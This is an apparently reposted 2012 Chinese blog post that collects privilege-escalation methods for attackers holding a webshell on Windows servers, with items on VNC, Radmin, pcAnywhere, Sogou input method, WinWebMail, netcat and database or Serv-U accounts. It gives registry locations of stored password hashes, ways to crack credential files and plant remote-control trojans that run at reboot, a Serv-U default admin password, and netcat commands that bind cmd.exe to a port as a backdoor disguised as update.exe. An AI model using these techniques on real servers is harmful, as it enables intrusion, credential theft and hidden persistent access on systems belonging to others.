webshell常用提权整理

作者：admin 发布于：2012-3-20 12:34 Tuesday 分类：网络转载

来源：http://www.tools.net/thread-6150-1-1.html 基本上目前常用的东西全都整理出来了，值得一看。

No.10 Vnc

Vnc不少老外都在用，国内用的比较少，但是几率很大。

============== VNC提权方法 ==============

利用shell读取vnc保存在注册表中的密文，

使用工具VNC4X破解 注册表位置：HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password 69 45 150 96 177 b1 243 f3 153 99 89 59 148 94 22 16

No.9 Radmin

Radmin 是一款很不错的服务器管理无论是远程桌面控制，还是文件传输，速度都很快，很方便。

Radmin 默认端口是4899，无密码。不过服务器注重的是安全，一定会修改默认端口和密码的，

端口与密码读取位置：HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter

默认密码注册表位置：HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置 以前我们可以用海洋木马所带的功能来读出键值,然后进行转换得到hash值,但是现在有个更方便的东西,把ASP文件传到服务器上,打开可直接读出 Radmin的hash和Radmin服务端口! 直接读取HASH值的小工具

No.8 PcAnywhere

PcAnywhere是一款用得很多的远程管理软件，他有一个重大漏洞是保存远程管理员帐号的CIF文件密码，是可以被轻易解密的，如果我们拿到一台主机 的WEBSEHLL。通过查找发现其上安装有PCANYWHERE 同时保存密码文件的目录是允许我们的IUSER权限访问，我们可以下载这个CIF文件到本地破解，再通过PCANYWHERE从本机登陆服务器。思路简单 而明确。 Ps:保存密码的CIF文件,不是位于PCANYWHERE的安装目录,而且位于安装PCANYWHERE所安装盘的\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 如果PCANYWHERE安装在D:\program\文件下下，那么PCANYWHERE的密码文件就保存在D:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\文件夹下。

No.7 搜狗输入法

不少管理都使用五笔打字，不过还是有少数人喜欢用拼音，智能ABC功能少，没有全拼功能，所以大多都选择了搜狗输入法。 搜狗输入法根目录下有一个：PinyinUp.exe 是用来更新词典用的，管理员为了保存词库，有可能会把搜狗输入法安装到D盘，搜狗输入法目录默认是Everyone可读可写，直接捆绑上远控等下次重启就 会上线了。

No.6 WinWebMail企业邮局系统 7i24.com WinWebMail目录下的web必须设置everyone权限可读可写，不然邮件登陆不上去等等，所以在开始程序里找到WinWebMail快捷方式 下下来，看路径，访问 路径\web传shell，访问shell后，权限是system，放远控进启动项，等待下次重启。没有删cmd组建的直接加用户。 7i24的web目录也是可写，权限为administrator。

No.5 NC反弹 nc的使用实例 c:\nc.exe -l -p 4455 -d -e cmd.exe 可以很好的隐藏一个NetCat后门。 c:\nc.exe -p 4455 -d -L -e cmd.exe 这个命令可以让黑客利用NetCat重新返回系统，直到系统管理员在任务管理器中看见nc.exe在运行，从而发现这个后门，我们一样可以把它做的更加隐 蔽。 c:\move nc.exe c:\windows\system32\Drivers\update.exe c:\windows\systeme32\drivers\update.exe -p 4455 -d -L -e cmd.exe 系统管理员可能把特权附属于一些无害的程序，如update.exe等，黑客也可以隐藏命令行。 c:\windows\systme32\drivers\update.exe cmd line: -l -p 4455 -d -L -e cmd.exe c:\> nc -l - p 80 监听80端口 nc -l -p 80 >c:\log.dat 监听80端口，并把信息记录到log.dat中 nc -v -l -p 80 监听80端口，并显示端口信息 nc -vv -l -p 80 监听80端口，显示更详细的端口信息 nc -l -p 80 -t -e cmd.exe监听本地的80端口的入站信息，同时将cmd.exe重定向到80端口，当有人连接的时候，就让 cmd.exe以telnet的形式应答。当然这个最好用在控制的肉鸡上。 nc -v ip port 扫瞄某IP的某个端口 nc -v -z ip port-port扫描某IP的端口到某端口 nc -v -z -u ip port-port扫描某IP的某UDP端口到某UDP端口 NC下载：千脑下载

No.4 mssql(sa) mysql(root) sa 1433对外关闭的话，可以构建注入点。 3.x版本默认本地管理端口是：43958，默认管理员：LocalAdministrator，默认密码：#l@$ak#.lk;0@P，这是集成在 Serv-u内部的，可以以Guest权限来进行连接，对Serv-u进行管理。

No.1 Oday 这个就算了吧，一般人根本弄不到。